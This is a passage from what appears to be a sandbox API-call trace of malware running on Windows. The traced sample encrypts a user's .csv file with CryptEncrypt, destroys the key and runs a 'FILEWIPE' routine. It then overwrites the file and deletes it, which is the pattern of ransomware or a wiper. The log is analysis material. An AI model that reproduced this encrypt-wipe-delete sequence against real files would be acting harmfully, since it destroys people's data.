hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.641] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.641] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0034.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.642] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.642] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.642] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.644] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x158e5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x158f0) returned 1 [0034.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.644] CharLowerBuffW (in: lpsz="byte[88305]", cchLength=0xb | out: lpsz="byte[88305]") returned 0xb [0034.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.647] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.648] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x158e5, dwBufLen=0x158f0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x158f0) returned 1 [0034.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.649] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.651] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.659] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0034.659] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.660] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.660] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0034.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.660] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0034.664] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x8e9b3a70, ftLastWriteTime.dwHighDateTime=0x1d5bff8, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0x7c2240 [0034.664] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.664] CharLowerBuffW (in: lpsz="byte[88293]", cchLength=0xb | out: lpsz="byte[88293]") returned 0xb [0034.665] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.665] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.665] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.665] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.666] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.667] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\nc9n uj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0034.667] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.667] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.668] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.668] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.668] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.668] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFilePart=0x0) returned 0x70 [0034.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x148b6de0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0x7c2240 [0034.668] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\nc9n uj.csv")) returned 1 [0034.670] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: 